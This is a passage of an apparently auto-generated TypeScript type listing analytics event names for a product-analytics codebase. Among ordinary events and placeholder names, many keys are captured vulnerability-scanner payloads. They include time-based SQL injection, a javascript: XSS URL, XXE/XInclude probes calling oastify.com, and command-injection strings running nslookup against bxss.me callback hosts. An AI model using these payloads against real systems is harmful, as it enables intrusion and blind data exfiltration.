    'ingestion third party about clicked': Record<string, any>
    'ingestion third party configure clicked': Record<string, any>
    'ingestion try posthog with bookmarklet clicked': Record<string, any>
    'ingestion try posthog with demo data clicked': Record<string, any>
    'ingestion turbo mode!!!!!': Record<string, any>
    'init-event': Record<string, any>
    'inner match property group filters type changed': Record<string, any>
    '{"$in":["$pageview"]}': Record<string, any>
    'insight analyzed': Record<string, any>
    'insight controls collapse toggled': Record<string, any>
    'insight created': Record<string, any>
    'insight error message shown': Record<string, any>
    'insight history item clicked': Record<string, any>
    'insight loaded': Record<string, any>
    'insight opened from recent insight list': Record<string, any>
    'insight person modal viewed': Record<string, any>
    'insight refresh time': Record<string, any>
    'insight saved': Record<string, any>
    'insight short url visited': Record<string, any>
    'insights table calc toggled': Record<string, any>
    'insights tab reset': Record<string, any>
    'insight subscription created': Record<string, any>
    'insight subscription updated': Record<string, any>
    'insight timeout message shown': Record<string, any>
    'insight updated': Record<string, any>
    'insight viewed': Record<string, any>
    'insight whitelabel toggled': Record<string, any>
    'instance setting change': Record<string, any>
    'instance status report': Record<string, any>
    'instance status report failure': Record<string, any>
    'internal test surveys metrics survey dismissed': Record<string, any>
    'internal test surveys metrics survey sent': Record<string, any>
    '!internal test! surveys metrics survey shown': Record<string, any>
    'internal test surveys metrics survey shown': Record<string, any>
    'invite members button clicked': Record<string, any>
    'invoice created': Record<string, any>
    'invoice deleted': Record<string, any>
    invoice_mrr_backfilled: Record<string, any>
    'invoice paid': Record<string, any>
    'Invoice Payment Failed': Record<string, any>
    "ipsljyDp'; waitfor delay '0:0:15' -- ": Record<string, any>
    "IqMpqUgD') OR 866=(SELECT 866 FROM PG_SLEEP(15))--": Record<string, any>
    'Isidro Wiza': Record<string, any>
    "IwckANZt' OR 560=(SELECT 560 FROM PG_SLEEP(15))--": Record<string, any>
    iWLr9SIw: Record<string, any>
    '@@IXxcq': Record<string, any>
    "j1ON9z5a') OR 873=(SELECT 873 FROM PG_SLEEP(15))--": Record<string, any>
    J2dOxMD7: Record<string, any>
    'Jacinthe Reichel': Record<string, any>
    'Jalen Barton': Record<string, any>
    'Janet Crooks': Record<string, any>
    "JatKMhM4' OR 163=(SELECT 163 FROM PG_SLEEP(15))--": Record<string, any>
    "javascript:alert('XSS')": Record<string, any>
    '<jbc xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://q6x59oji8v3vudz1r4dxglay0p6iuhih6fy2opfd4.oastify.com/jbc.xsd">jbc</jbc>': Record<
        string,
        any
    >
    jCAyn5yn: Record<string, any>
    "JDp19LdH' OR 531=(SELECT 531 FROM PG_SLEEP(15))--": Record<string, any>
    'Jerad Kertzmann': Record<string, any>
    "JGkAb70i') OR 569=(SELECT 569 FROM PG_SLEEP(15))--": Record<string, any>
    "JJRqQGXT' OR 193=(SELECT 193 FROM PG_SLEEP(15))--": Record<string, any>
    "jkuVSbDR')) OR 99=(SELECT 99 FROM PG_SLEEP(15))--": Record<string, any>
    job_board_issue_reported: Record<string, any>
    'job-seeker': Record<string, any>
    'Jodie Murray': Record<string, any>
    'Johanna Herman': Record<string, any>
    'join created': Record<string, any>
    'join updated': Record<string, any>
    'Jovany Larkin': Record<string, any>
    "jPSX6dpj'; waitfor delay '0:0:15' -- ": Record<string, any>
    JRIsc8wX: Record<string, any>
    'k9ure7nfr3bhil63zmr7u00h3890x3x4lw9u1hr4is7.burpcollaborator.net': Record<string, any>
    'Kavon Bins': Record<string, any>
    'Kayleigh Wunsch': Record<string, any>
    'Kaylie Smith': Record<string, any>
    "KGiUsN7j'; waitfor delay '0:0:15' -- ": Record<string, any>
    'Kristin Padberg': Record<string, any>
    kUrFZiMB: Record<string, any>
    "KvRoDk0x' OR 495=(SELECT 495 FROM PG_SLEEP(15))--": Record<string, any>
    '@@kXXAx': Record<string, any>
    "ky0dAr5c'; waitfor delay '0:0:15' -- ": Record<string, any>
    'langfuse generation': Record<string, any>
    'langfuse score': Record<string, any>
    'langfuse trace': Record<string, any>
    'latency test': Record<string, any>
    lBt47uUb: Record<string, any>
    'legacy insight endpoint called': Record<string, any>
    legacy_recording_filters_converted_tombstone: Record<string, any>
    'license key activation failure': Record<string, any>
    'license key activation success': Record<string, any>
    'license purchased': Record<string, any>
    'Lina Wolff': Record<string, any>
    "LinyX8Qe'; waitfor delay '0:0:15' -- ": Record<string, any>
    lior_test: Record<string, any>
    listing_capture_started: Record<string, any>
    'live_events_columns team setting updated': Record<string, any>
    live_verification_success: Record<string, any>
    'Lizzie Von': Record<string, any>
    "lMYbjjpc') OR 566=(SELECT 566 FROM PG_SLEEP(15))--": Record<string, any>
    'loaded every toolbar element stats pages': Record<string, any>
    'local evaluation usage': Record<string, any>
    'local filter removed': Record<string, any>
    Location: Record<string, any>
    lOdNzVZz: Record<string, any>
    login_data_entered: Record<string, any>
    login_error: Record<string, any>
    'login notification attempt': Record<string, any>
    'login notification sent': Record<string, any>
    login_started: Record<string, any>
    login_submitted: Record<string, any>
    'Lowell Ebert': Record<string, any>
    '{"$lt":"0"}': Record<string, any>
    "lun90vVx'; waitfor delay '0:0:15' -- ": Record<string, any>
    'Lysanne Hagenes': Record<string, any>
    '@@m4hbJ': Record<string, any>
    'Macey Predovic': Record<string, any>
    magic_ansible_install_complete: Record<string, any>
    magic_curl_install: Record<string, any>
    magic_curl_install_complete: Record<string, any>
    magic_curl_install_start: Record<string, any>
    magic_curl_install_start_mac: Record<string, any>
    '@@MAIZ2': Record<string, any>
    'Malika Konopelski': Record<string, any>
    'managed reverse proxy created': Record<string, any>
    'managed reverse proxy deleted': Record<string, any>
    'managed reverse proxy monitor-workflow-run': Record<string, any>
    MANUAL_TEST_12345: Record<string, any>
    manual_test_event: Record<string, any>
    'Manual Test Event': Record<string, any>
    manual_verification_test: Record<string, any>
    'Marianna Brakus': Record<string, any>
    'markdown image uploaded': Record<string, any>
    'markdown image upload failed': Record<string, any>
    'marketing_analytics_config team setting updated': Record<string, any>
    'materialized view created': Record<string, any>
    'materialized view updated': Record<string, any>
    'Matt Bartoletti': Record<string, any>
    'Matt Zboncak': Record<string, any>
    max_ai_conversation_start: Record<string, any>
    max_ai_request_error: Record<string, any>
    max_ai_subscribed: Record<string, any>
    max_ai_user_message: Record<string, any>
    'Maxie Lind': Record<string, any>
    'Max slash command autocomplete shown': Record<string, any>
    'Max slash command used': Record<string, any>
    'Maya Goldner': Record<string, any>
    'Mazie Franecki': Record<string, any>
    'mcp tool call': Record<string, any>
    'mcp tool response': Record<string, any>
    'membership level changed': Record<string, any>
    memory_usage: Record<string, any>
    'merch store order submitted': Record<string, any>
    'merge person completed': Record<string, any>
    'merge person modal opened': Record<string, any>
    'Merle Kilback': Record<string, any>
    'message too large warning seen': Record<string, any>
    'messaging campaign event conversion clicked': Record<string, any>
    "mEyOgrTO' OR 554=(SELECT 554 FROM PG_SLEEP(15))--": Record<string, any>
    "mHvEzSAt') OR 204=(SELECT 204 FROM PG_SLEEP(15))--": Record<string, any>
    'Mia Toy': Record<string, any>
    'Michale Davis': Record<string, any>
    middleware: Record<string, any>
    '<mid xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://lwlahqrfbgopb6m2xz2x28wtqkwck7bvcjabx1ks8h.oastify.com/foo"/></mid>': Record<
        string,
        any
    >
    'Mikayla Marquardt': Record<string, any>
    MiL3AMmT: Record<string, any>
    "MlFLOLJg') OR 917=(SELECT 917 FROM PG_SLEEP(15))--": Record<string, any>
    'modifiers team setting updated': Record<string, any>
    'Mossie Ankunding': Record<string, any>
    'movie played': Record<string, any>
    "mRveTxT6' OR 107=(SELECT 107 FROM PG_SLEEP(15))--": Record<string, any>
    "msCcjqdF') OR 524=(SELECT 524 FROM PG_SLEEP(15))--": Record<string, any>
    MUopfqUi: Record<string, any>
    "mwwwUEbD')) OR 948=(SELECT 948 FROM PG_SLEEP(15))--": Record<string, any>
    "MXWhMUKh')) OR 298=(SELECT 298 FROM PG_SLEEP(15))--": Record<string, any>
    'my custom event': Record<string, any>
    'my event': Record<string, any>
    'My Event': Record<string, any>
    'my event89678989': Record<string, any>
    'my example event': Record<string, any>
    'Myrl Schneider': Record<string, any>
    "N5n9VSle'; waitfor delay '0:0:15' -- ": Record<string, any>
    '@@n9he3': Record<string, any>
    "nAbCZ3vH' OR 211=(SELECT 211 FROM PG_SLEEP(15))--": Record<string, any>
    'name project setting updated': Record<string, any>
    'name team setting updated': Record<string, any>
    'Napoleon Rowe': Record<string, any>
    'nav panel advertisement clicked': Record<string, any>
    'nav panel advertisement dismissed': Record<string, any>
    'nav panel advertisement docs clicked': Record<string, any>
    'nav panel advertisement learn more clicked': Record<string, any>
    'nav panel advertisement shown': Record<string, any>
    NbKuA5nU: Record<string, any>
    "NbNqmTHw'; waitfor delay '0:0:15' -- ": Record<string, any>
    "nbOVDSJs') OR 44=(SELECT 44 FROM PG_SLEEP(15))--": Record<string, any>
    nbPjVqUp: Record<string, any>
    'ndbvidcc77`z\'z"${{%{{\\': Record<string, any>
    network_test_1: Record<string, any>
    network_test_2: Record<string, any>
    new_contribution: Record<string, any>
    'new role created': Record<string, any>
    newsletter_read_first_clicked: Record<string, any>
    newsletter_subscribed: Record<string, any>
    new_test_event: Record<string, any>
    'next steps - How teams are using PostHog: How Hasura improved conversion rates by 10-20% with PostHog': Record<
        string,
        any
    >
    'next steps - How teams are using PostHog: How Mention Me researches users without sacrificing their privacy': Record<
        string,
        any
    >
    'next steps - installing posthog: Compare plans and benefits': Record<string, any>
    'next steps - installing posthog: Get a license key': Record<string, any>
    'next steps - installing posthog: Try PostHog Cloud - free': Record<string, any>
    'next steps - installing posthog: View deployment instructions': Record<string, any>
    'next steps - Learn more about PostHog: Visit our YouTube': Record<string, any>
    'next steps - Plans & pricing: Compare plans & calculate pricing': Record<string, any>
    nftc9gqbn1: Record<string, any>
    NfyJzf2y: Record<string, any>
    'Nikko Gleason': Record<string, any>
    NinIdfgp: Record<string, any>
    "njpUB6Kk')) OR 177=(SELECT 177 FROM PG_SLEEP(15))--": Record<string, any>
    NKqetB8Z: Record<string, any>
    '@@Nl7tK': Record<string, any>
    nmy19gR8: Record<string, any>
    '@@No33Z': Record<string, any>
    'Noemie Zulauf': Record<string, any>
    'None failure': Record<string, any>
    'None to billing service failure': Record<string, any>
    'notebook containing filter applied': Record<string, any>
    'notebook content changed': Record<string, any>
    'notebook created': Record<string, any>
    'notebook duplicated': Record<string, any>
    'notebook editing node title': Record<string, any>
    'notebook file dropped': Record<string, any>
    'notebook files dropped': Record<string, any>
    'notebook files pasted': Record<string, any>
    'notebook node added': Record<string, any>
    'notebook node dropped': Record<string, any>
    'notebook node expanded': Record<string, any>
    'notebook node pasted': Record<string, any>
    'notebook node selected': Record<string, any>
    'notebook node title updated': Record<string, any>
    'notebook sidebar hidden': Record<string, any>
    'notebook sidebar peek': Record<string, any>
    'notebook sidebar shown': Record<string, any>
    'notebook sidebar visible': Record<string, any>
    not_found_shown: Record<string, any>
    notify_me_pipeline: Record<string, any>
    'nps feedback': Record<string, any>
    'nps modal shown': Record<string, any>
    'NPS rating submitted': Record<string, any>
    "Ns1L7U7y') OR 155=(SELECT 155 FROM PG_SLEEP(15))--": Record<string, any>
    '(nslookup hitabmidaospra66bf.bxss.me||perl -e "gethostbyname(\'hitabmidaospra66bf.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitajlgurskbme815e.bxss.me||perl -e "gethostbyname(\'hitajlgurskbme815e.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitamrliekjgw86428.bxss.me||perl -e "gethostbyname(\'hitamrliekjgw86428.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitanrxstdzhu84619.bxss.me||perl -e \"gethostbyname('hitanrxstdzhu84619.bxss.me')\")&'\\\"`0&(nslookup hitanrxstdzhu84619.bxss.me||perl -e \"gethostbyname('hitanrxstdzhu84619.bxss.me')\")&`'": Record<
        string,
        any
    >
    "&(nslookup hitaocsoblolr04b6e.bxss.me||perl -e \"gethostbyname('hitaocsoblolr04b6e.bxss.me')\")&'\\\"`0&(nslookup hitaocsoblolr04b6e.bxss.me||perl -e \"gethostbyname('hitaocsoblolr04b6e.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitapkcgwhkpd49096.bxss.me||perl -e "gethostbyname(\'hitapkcgwhkpd49096.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitarswprhegyfe99f.bxss.me||perl -e "gethostbyname(\'hitarswprhegyfe99f.bxss.me\')")|(nslookup hitarswprhegyfe99f.bxss.me||perl -e "gethostbyname(\'hitarswprhegyfe99f.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '`(nslookup hitauxdhhibuvedd8a.bxss.me||perl -e "gethostbyname(\'hitauxdhhibuvedd8a.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitbbalnamknh6ae27.bxss.me||perl -e "gethostbyname(\'hitbbalnamknh6ae27.bxss.me\')")|(nslookup hitbbalnamknh6ae27.bxss.me||perl -e "gethostbyname(\'hitbbalnamknh6ae27.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hitbkfxvjgqvk02467.bxss.me||perl -e "gethostbyname(\'hitbkfxvjgqvk02467.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitbzbkqqqqtzac4bf.bxss.me||perl -e "gethostbyname(\'hitbzbkqqqqtzac4bf.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitbzdhnanfrj5032f.bxss.me||perl -e "gethostbyname(\'hitbzdhnanfrj5032f.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitbzgwevutbk612f6.bxss.me||perl -e "gethostbyname(\'hitbzgwevutbk612f6.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitchanmrftlc28e74.bxss.me||perl -e "gethostbyname(\'hitchanmrftlc28e74.bxss.me\')")|(nslookup hitchanmrftlc28e74.bxss.me||perl -e "gethostbyname(\'hitchanmrftlc28e74.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '`(nslookup hitcktcfkjwpw06100.bxss.me||perl -e "gethostbyname(\'hitcktcfkjwpw06100.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitcocrfkgeza40ac7.bxss.me||perl -e "gethostbyname(\'hitcocrfkgeza40ac7.bxss.me\')")|(nslookup hitcocrfkgeza40ac7.bxss.me||perl -e "gethostbyname(\'hitcocrfkgeza40ac7.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '|(nslookup hitcotijaopac74849.bxss.me||perl -e "gethostbyname(\'hitcotijaopac74849.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitcpttoblthz64e62.bxss.me||perl -e "gethostbyname(\'hitcpttoblthz64e62.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitcqmjjhgcpp5c548.bxss.me||perl -e "gethostbyname(\'hitcqmjjhgcpp5c548.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitcxotnwyoawe2485.bxss.me||perl -e "gethostbyname(\'hitcxotnwyoawe2485.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitcybraoffoh31027.bxss.me||perl -e "gethostbyname(\'hitcybraoffoh31027.bxss.me\')")`': Record<
        string,
        any
    >
    '|(nslookup hitczajfcyvwu69f87.bxss.me||perl -e "gethostbyname(\'hitczajfcyvwu69f87.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitdcuwvuagpo9adc9.bxss.me||perl -e "gethostbyname(\'hitdcuwvuagpo9adc9.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitdzrccdmvkade2ae.bxss.me||perl -e "gethostbyname(\'hitdzrccdmvkade2ae.bxss.me\')")|(nslookup hitdzrccdmvkade2ae.bxss.me||perl -e "gethostbyname(\'hitdzrccdmvkade2ae.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '|(nslookup hitealwoikdsz64989.bxss.me||perl -e "gethostbyname(\'hitealwoikdsz64989.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitedcpigifxx1d558.bxss.me||perl -e "gethostbyname(\'hitedcpigifxx1d558.bxss.me\')")|(nslookup hitedcpigifxx1d558.bxss.me||perl -e "gethostbyname(\'hitedcpigifxx1d558.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '`(nslookup hitejhbhisbpy586af.bxss.me||perl -e "gethostbyname(\'hitejhbhisbpy586af.bxss.me\')")`': Record<
        string,
        any
    >
    '(nslookup hitepbynjpuft9a6cf.bxss.me||perl -e "gethostbyname(\'hitepbynjpuft9a6cf.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitesjvrkajsrcd3da.bxss.me||perl -e "gethostbyname(\'hitesjvrkajsrcd3da.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitexakopaeqmbc693.bxss.me||perl -e "gethostbyname(\'hitexakopaeqmbc693.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitfllfrdymkb062ed.bxss.me||perl -e "gethostbyname(\'hitfllfrdymkb062ed.bxss.me\')")|(nslookup hitfllfrdymkb062ed.bxss.me||perl -e "gethostbyname(\'hitfllfrdymkb062ed.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    "&(nslookup hitfuajeayetd615f4.bxss.me||perl -e \"gethostbyname('hitfuajeayetd615f4.bxss.me')\")&'\\\"`0&(nslookup hitfuajeayetd615f4.bxss.me||perl -e \"gethostbyname('hitfuajeayetd615f4.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitfvdjkunvuz82bc6.bxss.me||perl -e "gethostbyname(\'hitfvdjkunvuz82bc6.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitgexxktuwlkb48c8.bxss.me||perl -e \"gethostbyname('hitgexxktuwlkb48c8.bxss.me')\")&'\\\"`0&(nslookup hitgexxktuwlkb48c8.bxss.me||perl -e \"gethostbyname('hitgexxktuwlkb48c8.bxss.me')\")&`'": Record<
        string,
        any
    >
    '|(nslookup hitghxzliaaita1d02.bxss.me||perl -e "gethostbyname(\'hitghxzliaaita1d02.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitglenqyvsku6c3f1.bxss.me||perl -e "gethostbyname(\'hitglenqyvsku6c3f1.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitgrnmyzuaqf62ab3.bxss.me||perl -e \"gethostbyname('hitgrnmyzuaqf62ab3.bxss.me')\")&'\\\"`0&(nslookup hitgrnmyzuaqf62ab3.bxss.me||perl -e \"gethostbyname('hitgrnmyzuaqf62ab3.bxss.me')\")&`'": Record<
        string,
        any
    >
    '(nslookup hitgzjmhcgelqf3eda.bxss.me||perl -e "gethostbyname(\'hitgzjmhcgelqf3eda.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hithecqkwyyxv87b63.bxss.me||perl -e "gethostbyname(\'hithecqkwyyxv87b63.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hithgnnlexabo63c97.bxss.me||perl -e "gethostbyname(\'hithgnnlexabo63c97.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hithuvboydyeu40eb6.bxss.me||perl -e \"gethostbyname('hithuvboydyeu40eb6.bxss.me')\")&'\\\"`0&(nslookup hithuvboydyeu40eb6.bxss.me||perl -e \"gethostbyname('hithuvboydyeu40eb6.bxss.me')\")&`'": Record<
        string,
        any
    >
    '|(nslookup hithyuzrmywdl309ce.bxss.me||perl -e "gethostbyname(\'hithyuzrmywdl309ce.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitiaqzwalnhz74187.bxss.me||perl -e "gethostbyname(\'hitiaqzwalnhz74187.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitigqcydxltf53ef8.bxss.me||perl -e "gethostbyname(\'hitigqcydxltf53ef8.bxss.me\')")': Record<
        string,
        any
    >
    "&(nslookup hitigsebeadhqcb849.bxss.me||perl -e \"gethostbyname('hitigsebeadhqcb849.bxss.me')\")&'\\\"`0&(nslookup hitigsebeadhqcb849.bxss.me||perl -e \"gethostbyname('hitigsebeadhqcb849.bxss.me')\")&`'": Record<
        string,
        any
    >
    '|(nslookup hitihkcammmes11d39.bxss.me||perl -e "gethostbyname(\'hitihkcammmes11d39.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitijamwejvdp84ef6.bxss.me||perl -e "gethostbyname(\'hitijamwejvdp84ef6.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitilwpoiufhh4e4db.bxss.me||perl -e "gethostbyname(\'hitilwpoiufhh4e4db.bxss.me\')")|(nslookup hitilwpoiufhh4e4db.bxss.me||perl -e "gethostbyname(\'hitilwpoiufhh4e4db.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    "&(nslookup hitiniysqzdta3a446.bxss.me||perl -e \"gethostbyname('hitiniysqzdta3a446.bxss.me')\")&'\\\"`0&(nslookup hitiniysqzdta3a446.bxss.me||perl -e \"gethostbyname('hitiniysqzdta3a446.bxss.me')\")&`'": Record<
        string,
        any
    >
    ';(nslookup hitjfrgtvwngoc7ddb.bxss.me||perl -e "gethostbyname(\'hitjfrgtvwngoc7ddb.bxss.me\')")|(nslookup hitjfrgtvwngoc7ddb.bxss.me||perl -e "gethostbyname(\'hitjfrgtvwngoc7ddb.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    "&(nslookup hitjibfcgqzvjd1a32.bxss.me||perl -e \"gethostbyname('hitjibfcgqzvjd1a32.bxss.me')\")&'\\\"`0&(nslookup hitjibfcgqzvjd1a32.bxss.me||perl -e \"gethostbyname('hitjibfcgqzvjd1a32.bxss.me')\")&`'": Record<
        string,
        any
    >
    "&(nslookup hitjsvhmmrjzl82dc3.bxss.me||perl -e \"gethostbyname('hitjsvhmmrjzl82dc3.bxss.me')\")&'\\\"`0&(nslookup hitjsvhmmrjzl82dc3.bxss.me||perl -e \"gethostbyname('hitjsvhmmrjzl82dc3.bxss.me')\")&`'": Record<
        string,
        any
    >
    ';(nslookup hitjtxyaiqbod793ca.bxss.me||perl -e "gethostbyname(\'hitjtxyaiqbod793ca.bxss.me\')")|(nslookup hitjtxyaiqbod793ca.bxss.me||perl -e "gethostbyname(\'hitjtxyaiqbod793ca.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '`(nslookup hitjvnasuojjl04e54.bxss.me||perl -e "gethostbyname(\'hitjvnasuojjl04e54.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitjwiigdxinb3dcdb.bxss.me||perl -e "gethostbyname(\'hitjwiigdxinb3dcdb.bxss.me\')")|(nslookup hitjwiigdxinb3dcdb.bxss.me||perl -e "gethostbyname(\'hitjwiigdxinb3dcdb.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '`(nslookup hitjwkflzyzoo61048.bxss.me||perl -e "gethostbyname(\'hitjwkflzyzoo61048.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitjzgqmatsyyccc9a.bxss.me||perl -e \"gethostbyname('hitjzgqmatsyyccc9a.bxss.me')\")&'\\\"`0&(nslookup hitjzgqmatsyyccc9a.bxss.me||perl -e \"gethostbyname('hitjzgqmatsyyccc9a.bxss.me')\")&`'": Record<
        string,
        any
    >
    ';(nslookup hitkblhquxgak120b3.bxss.me||perl -e "gethostbyname(\'hitkblhquxgak120b3.bxss.me\')")|(nslookup hitkblhquxgak120b3.bxss.me||perl -e "gethostbyname(\'hitkblhquxgak120b3.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '|(nslookup hitkgzcgdfvwp3fde0.bxss.me||perl -e "gethostbyname(\'hitkgzcgdfvwp3fde0.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitkhrooyepxg48239.bxss.me||perl -e "gethostbyname(\'hitkhrooyepxg48239.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitkhvdiajydo2d878.bxss.me||perl -e "gethostbyname(\'hitkhvdiajydo2d878.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitkrqywfqvtu17685.bxss.me||perl -e "gethostbyname(\'hitkrqywfqvtu17685.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitkstqifpczi051da.bxss.me||perl -e "gethostbyname(\'hitkstqifpczi051da.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitlaurcfeduidb3a3.bxss.me||perl -e "gethostbyname(\'hitlaurcfeduidb3a3.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitlifqcjeuxc64a40.bxss.me||perl -e "gethostbyname(\'hitlifqcjeuxc64a40.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitlllshwdkwv4daeb.bxss.me||perl -e "gethostbyname(\'hitlllshwdkwv4daeb.bxss.me\')")|(nslookup hitlllshwdkwv4daeb.bxss.me||perl -e "gethostbyname(\'hitlllshwdkwv4daeb.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hitlmwsllxiyx8e219.bxss.me||perl -e "gethostbyname(\'hitlmwsllxiyx8e219.bxss.me\')")': Record<
        string,
        any
    >
    "&(nslookup hitlqsfakzhaofed74.bxss.me||perl -e \"gethostbyname('hitlqsfakzhaofed74.bxss.me')\")&'\\\"`0&(nslookup hitlqsfakzhaofed74.bxss.me||perl -e \"gethostbyname('hitlqsfakzhaofed74.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitlrcrxearubb65a2.bxss.me||perl -e "gethostbyname(\'hitlrcrxearubb65a2.bxss.me\')")`': Record<
        string,
        any
    >
    '`(nslookup hitlzqegviqbh88294.bxss.me||perl -e "gethostbyname(\'hitlzqegviqbh88294.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitmfafcovlrza4a1b.bxss.me||perl -e \"gethostbyname('hitmfafcovlrza4a1b.bxss.me')\")&'\\\"`0&(nslookup hitmfafcovlrza4a1b.bxss.me||perl -e \"gethostbyname('hitmfafcovlrza4a1b.bxss.me')\")&`'": Record<
        string,
        any
    >
    "&(nslookup hitmfcgcoobnud65e2.bxss.me||perl -e \"gethostbyname('hitmfcgcoobnud65e2.bxss.me')\")&'\\\"`0&(nslookup hitmfcgcoobnud65e2.bxss.me||perl -e \"gethostbyname('hitmfcgcoobnud65e2.bxss.me')\")&`'": Record<
        string,
        any
    >
    ';(nslookup hitmmjtaxfymvf4390.bxss.me||perl -e "gethostbyname(\'hitmmjtaxfymvf4390.bxss.me\')")|(nslookup hitmmjtaxfymvf4390.bxss.me||perl -e "gethostbyname(\'hitmmjtaxfymvf4390.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '`(nslookup hitmphdqcolinad1f0.bxss.me||perl -e "gethostbyname(\'hitmphdqcolinad1f0.bxss.me\')")`': Record<
        string,
        any
    >
    '|(nslookup hitmvtkhqnzoa72ef7.bxss.me||perl -e "gethostbyname(\'hitmvtkhqnzoa72ef7.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitmwuszhsteo2122c.bxss.me||perl -e "gethostbyname(\'hitmwuszhsteo2122c.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitmxirwhghae247b2.bxss.me||perl -e "gethostbyname(\'hitmxirwhghae247b2.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitmzazcfxqer902a7.bxss.me||perl -e "gethostbyname(\'hitmzazcfxqer902a7.bxss.me\')")|(nslookup hitmzazcfxqer902a7.bxss.me||perl -e "gethostbyname(\'hitmzazcfxqer902a7.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hitnfdnzhwrpr74f25.bxss.me||perl -e "gethostbyname(\'hitnfdnzhwrpr74f25.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitngmdgljhut21dab.bxss.me||perl -e "gethostbyname(\'hitngmdgljhut21dab.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitnooibjdreg390f2.bxss.me||perl -e "gethostbyname(\'hitnooibjdreg390f2.bxss.me\')")`': Record<
        string,
        any
    >
    '`(nslookup hitnvujhaseew6edff.bxss.me||perl -e "gethostbyname(\'hitnvujhaseew6edff.bxss.me\')")`': Record<
        string,
        any
    >
    '|(nslookup hitnxizgemyie01117.bxss.me||perl -e "gethostbyname(\'hitnxizgemyie01117.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitnzdlupkmlb49792.bxss.me||perl -e "gethostbyname(\'hitnzdlupkmlb49792.bxss.me\')")|(nslookup hitnzdlupkmlb49792.bxss.me||perl -e "gethostbyname(\'hitnzdlupkmlb49792.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    ';(nslookup hitoibgfkywuu4dcb5.bxss.me||perl -e "gethostbyname(\'hitoibgfkywuu4dcb5.bxss.me\')")|(nslookup hitoibgfkywuu4dcb5.bxss.me||perl -e "gethostbyname(\'hitoibgfkywuu4dcb5.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    "&(nslookup hitoklrejemrk4f4a5.bxss.me||perl -e \"gethostbyname('hitoklrejemrk4f4a5.bxss.me')\")&'\\\"`0&(nslookup hitoklrejemrk4f4a5.bxss.me||perl -e \"gethostbyname('hitoklrejemrk4f4a5.bxss.me')\")&`'": Record<
        string,
        any
    >
    '(nslookup hitotaiwklknif0fd1.bxss.me||perl -e "gethostbyname(\'hitotaiwklknif0fd1.bxss.me\')")': Record<
        string,
        any
    >
